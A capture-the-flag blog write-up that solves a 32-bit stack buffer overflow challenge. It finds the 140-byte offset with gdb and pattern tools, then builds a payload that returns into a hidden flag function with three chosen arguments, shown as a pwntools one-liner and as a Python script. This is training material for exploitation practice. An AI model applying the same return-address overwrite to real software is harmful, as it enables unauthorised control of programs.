Hidden Flag Function Parameter (pwn)

PUBLISHED ON 22/03/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC


This is my write-up of the pwnable challenge Hidden Flag Function Parameter on the 247CTF site.


Can you control this application's flow to gain access to the hidden flag function with the correct parameters?


This one is very similar to Hidden Flag Function, but as the instructions say, we also have to pass the right parameters to the flag function to get the flag.

I found a lot of good stuff here.

kali@kali:~$ checksec hidden_flag_function_with_args
[*] '/home/kali/hidden_flag_function_with_args'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

We have a 32-bit little-endian binary with NX enabled, so we cannot run shellcode from the stack. On the other hand there is no stack canary and no PIE: we can overwrite the saved return address, and the flag function sits at a fixed address we can return into.

Let's create a cyclic (non-repeating) pattern, so that the value that ends up in EIP tells us the offset of the return address:

kali@kali:~$ msf-pattern_create -l 300

Run the binary under gdb (I recommend installing gef) and paste the pattern obtained in the previous step as the input:

kali@kali:~$ gdb -q ./hidden_flag_function_with_args
GEF for linux ready, type `gef' to start, `gef config' to configure
75 commands loaded for GDB 9.1 using Python engine 3.8
[*] 5 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./hidden_flag_function_with_args...
(No debugging symbols found in ./hidden_flag_function_with_args)
gef➤  r
Starting program: /home/kali/hidden_flag_function_with_args
Sorry, no flag here!
You can ask for one though:

Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0x1
$ebx   : 0x41346541 ("Ae4A"?)
$ecx   : 0x0
$edx   : 0xf7fb601c    0x00000000
$esp   : 0xffffd4c0    "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"
$ebp   : 0x65413565 ("e5Ae"?)
$esi   : 0xf7fb4000    0x001d6d6c
$edi   : 0xf7fb4000    0x001d6d6c
$eip   : 0x37654136 ("6Ae7"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd4c0+0x0000: "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"	  $esp
0xffffd4c4+0x0004: "e9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5[...]"
0xffffd4c8+0x0008: "0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A[...]"
0xffffd4cc+0x000c: "Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag[...]"
0xffffd4d0+0x0010: "f3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9[...]"
0xffffd4d4+0x0014: "4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0A[...]"
0xffffd4d8+0x0018: "Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah[...]"
0xffffd4dc+0x001c: "f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x37654136
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hidden_flag_fun", stopped 0x37654136 in ?? (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

The program crashes with EIP = 0x37654136 (the bytes "6Ae7" of the pattern, read little-endian), so we use msf-pattern_offset to calculate the offset of the return address:

kali@kali:~$ msf-pattern_offset -q 0x37654136
[*] Exact match at offset 140

Now let's look at the objdump of the binary. We are searching for cmp instructions in the flag function, since we know some conditions on the parameters have to be met:

kali@kali:~$ objdump -drwC -Mintel -d hidden_flag_function_with_args
08048576 <flag>:
 8048576:	55                   	push   ebp
 8048577:	89 e5                	mov    ebp,esp
 8048579:	53                   	push   ebx
 804857a:	81 ec 94 00 00 00    	sub    esp,0x94
 8048580:	e8 2b ff ff ff       	call   80484b0 <__x86.get_pc_thunk.bx>
 8048585:	81 c3 7b 1a 00 00    	add    ebx,0x1a7b
 804858b:	81 7d 08 37 13 00 00 	cmp    DWORD PTR [ebp+0x8],0x1337
 8048592:	75 63                	jne    80485f7 <flag+0x81>
 8048594:	81 7d 0c 47 02 00 00 	cmp    DWORD PTR [ebp+0xc],0x247
 804859b:	75 5a                	jne    80485f7 <flag+0x81>
 804859d:	81 7d 10 78 56 34 12 	cmp    DWORD PTR [ebp+0x10],0x12345678
 80485a4:	75 51                	jne    80485f7 <flag+0x81>

So the three parameters, read from [ebp+0x8], [ebp+0xc] and [ebp+0x10], need to be 0x1337, 0x247 and 0x12345678. After main's ret pops the address of flag and flag runs push ebp; mov ebp,esp, the dword following the overwritten return address becomes [ebp+0x4] (the return address of flag itself, which is never used cleanly, so any 4 bytes will do) and the next three dwords are the arguments in order.

kali@kali:~$ python -c "from pwn import *; print 'a' * 140 + p32(0x08048576) + 'P' * 4 + p32(0x1337) + p32(0x247) + p32(0x12345678)" | nc 50284
Sorry, no flag here!
You can ask for one though:
How did you get here?
Have a flag!
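To make the stack layout behind that one-liner explicit, here is an added Python 3 example that is not part of the original write-up and does not use pwntools or talk to the challenge service. It reproduces the msf pattern generation and offset lookup locally, builds the same payload, and shows which dword lands in each [ebp+N] slot of flag(). The crash EIP, the address of flag and the three constants are the ones from the output above; the function names and the frame_view helper are my own.

```python
import struct
import string
import sys

# Values taken from the write-up above (objdump and the gef crash).
FLAG_ADDR = 0x08048576               # address of flag()
ARGS = (0x1337, 0x247, 0x12345678)   # the three cmp constants, in order
CRASH_EIP = 0x37654136               # EIP at the SIGSEGV under gef


def p32(value):
    """Pack a 32-bit little-endian value (what pwntools p32 does on i386)."""
    return struct.pack("<I", value)


def msf_pattern(length):
    """Reproduce the msf-pattern_create sequence Aa0Aa1...Aa9Ab0...:
    upper case letter slowest, lower case in the middle, digit fastest."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip):
    """Mirror msf-pattern_offset: locate the four bytes that landed in EIP
    (little-endian) inside the pattern. Returns -1 if they are not present."""
    return pattern.find(p32(eip))


def build_payload(offset, func_addr, args, fake_ret=b"PPPP"):
    """Padding up to the saved EIP, the address to return into, a fake
    return address for that function, then its arguments in order."""
    payload = b"a" * offset + p32(func_addr) + fake_ret
    for arg in args:
        payload += p32(arg)
    return payload


def frame_view(payload, offset):
    """Describe what flag() sees after its prologue (push ebp; mov ebp,esp):
    the dword right after the overwritten EIP is [ebp+0x4], then the args."""
    base = offset + 4
    slots = ("ebp+0x4", "ebp+0x8", "ebp+0xc", "ebp+0x10")
    frame = {}
    for i, name in enumerate(slots):
        chunk = payload[base + 4 * i: base + 4 * i + 4]
        frame[name] = struct.unpack("<I", chunk)[0]
    return frame


if __name__ == "__main__":
    # Usage: python3 exploit.py | nc <host> <port>
    off = pattern_offset(msf_pattern(300), CRASH_EIP)
    sys.stderr.write("offset = %d\n" % off)
    sys.stdout.buffer.write(build_payload(off, FLAG_ADDR, ARGS))
```

The payload is written to stdout as raw bytes so it can be piped into nc exactly like the one-liner; the computed offset goes to stderr so it does not pollute the payload.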
